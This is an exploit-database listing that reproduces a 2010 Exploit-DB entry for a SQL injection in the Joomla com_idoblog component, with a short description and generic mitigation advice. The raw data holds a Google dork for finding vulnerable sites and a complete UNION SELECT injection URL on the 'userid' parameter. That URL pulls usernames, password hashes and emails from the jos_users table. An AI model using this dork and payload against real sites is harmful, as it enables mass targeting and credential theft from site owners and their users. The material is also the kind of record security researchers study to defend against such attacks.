header-logo
Suggest Exploit
vendor:
Joomla
by:
NOCKAR1111
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From: All versions of Joomla with the com_idoblog component
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 (English)
2010

joomla com_idoblog /SQL injection Vulnerability

This exploit allows an attacker to inject SQL code into the com_idoblog component of Joomla. By manipulating the 'userid' parameter, the attacker can execute arbitrary SQL queries on the database. The result of the query is then displayed on the website, potentially exposing sensitive information such as usernames, passwords, and email addresses of the Joomla users.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of Joomla or apply any available patches. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:nockar1111@hotmail.com
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members

Navigation

Suggest Exploit

Services By CQR